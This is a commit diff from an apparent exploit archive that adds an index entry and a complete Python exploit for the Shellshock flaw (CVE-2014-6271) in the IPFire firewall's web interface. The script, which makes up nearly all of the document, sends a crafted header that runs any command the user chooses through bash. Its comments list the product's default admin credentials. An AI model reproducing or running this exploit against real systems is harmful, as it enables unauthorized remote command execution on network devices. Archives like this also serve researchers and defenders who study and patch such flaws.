Updated 10_06_2014

2014-10-06 04:44:51 +00:00 · 2014-10-06 04:44:51 +00:00 · 63098d36da
commit 63098d36da
parent dbf77f5aaf
2 changed files with 147 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -31367,6 +31367,7 @@ id,file,description,date,author,platform,type,port
 34836,platforms/windows/remote/34836.py,"Notepad++ 5.8.2 'libtidy.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-12,anT!-Tr0J4n,windows,remote,0
 34837,platforms/php/webapps/34837.txt,"Joomla! 'com_jstore' Component 'controller' Parameter Local File Include Vulnerability",2010-10-13,jos_ali_joe,php,webapps,0
 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-13,anT!-Tr0J4n,windows,remote,0
 34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0
 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
 34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0
 34842,platforms/php/webapps/34842.txt,"TWiki <= 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0
--- a/platforms/cgi/webapps/34839.py
+++ b/platforms/cgi/webapps/34839.py
@ -0,0 +1,146 @@
 #!/usr/bin/env python
 #
 # Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
 #
 # Exploit Author : Claudio Viviani
 #
 # Vendor Homepage : http://www.ipfire.org
 #
 # Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
 #
 # Date : 2014-09-29
 #
 # Fixed version: IPFire 2.15 core 83 (2014-09-28)
 #
 # Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
 #       It can be maintained via a web interface.
 #       The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
 #       IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
 #
 # Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
 #                (CVE-2014-6271)
 #
 # Suggestion:
 #
 # If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
 # make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
 #
 #
 # http connection
 import urllib2
 # Basic Auth management Base64
 import base64
 # Args management
 import optparse
 # Error management
 import sys
 banner = """
       ___ _______ _______ __                _______       __
      |   |   _   |   _   |__.----.-----.   |   _   .-----|__|
      |.  |.  1   |.  1___|  |   _|  -__|   |.  1___|  _  |  |
      |.  |.  ____|.  __) |__|__| |_____|   |.  |___|___  |__|
      |:  |:  |   |:  |                     |:  1   |_____|
      |::.|::.|   |::.|                     |::.. . |
      `---`---'   `---'                     `-------'
   _______ __          __ __ _______ __               __
  |   _   |  |--.-----|  |  |   _   |  |--.-----.----|  |--.
  |   1___|     |  -__|  |  |   1___|     |  _  |  __|    <
  |____   |__|__|_____|__|__|____   |__|__|_____|____|__|__|
  |:  1   |                 |:  1   |
  |::.. . |                 |::.. . |
  `-------'                 `-------'
                                IPFire <= 2.15 c0re 82 Authenticated
                                Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
                          Written by:
                        Claudio Viviani
                     http://www.homelab.it
                        info@homelab.it
                    homelabit@protonmail.ch
               https://www.facebook.com/homelabit
                  https://twitter.com/homelabit
               https://plus.google.com/+HomelabIt1/
     https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 """
 # Check url
 def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url
 def connectionScan(url,user,pwd,cmd):
    print '[+] Connection in progress...'
    try:
        response = urllib2.Request(url)
        content = urllib2.urlopen(response)
        print '[X] IPFire Basic Authentication not found'
    except urllib2.HTTPError, e:
        if e.code == 404:
            print '[X] Page not found'
        elif e.code == 401:
            try:
                print '[+] Authentication in progress...'
                base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
                headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
                response = urllib2.Request(url, None, headers)
                response.add_header("Authorization", "Basic %s" % base64string)
                content = urllib2.urlopen(response).read()
                if "ipfire" in content:
                    print '[+] Username & Password: OK'
                    print '[+] Checking for vulnerability...'
                    if 'H0m3l4b1t' in  content:
                        print '[!] Command "'+cmd+'": INJECTED!'
                    else:
                        print '[X] Not Vulnerable :('
                else:
                     print '[X] No IPFire page found'
            except urllib2.HTTPError, e:
                if e.code == 401:
                   print '[X] Wrong username or password'
                else:
                   print '[X] HTTP Error: '+str(e.code)
            except urllib2.URLError:
                print '[X] Connection Error'
        else:
            print '[X] HTTP Error: '+str(e.code)
    except urllib2.URLError:
        print '[X] Connection Error'
 commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
 commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL",
                  )
 commandList.add_option('-c', '--cmd', action="store",
                  help="Insert command name",
                  )
 commandList.add_option('-u', '--user', action="store",
                  help="Insert username",
                  )
 commandList.add_option('-p', '--pwd', action="store",
                  help="Insert password",
                  )
 options, remainder = commandList.parse_args()
 # Check args
 if not options.target or not options.cmd or not options.user or not options.pwd:
    print(banner)
    commandList.print_help()
    sys.exit(1)
 print(banner)
 url = checkurl(options.target)
 cmd = options.cmd
 user = options.user
 pwd = options.pwd
 connectionScan(url,user,pwd,cmd)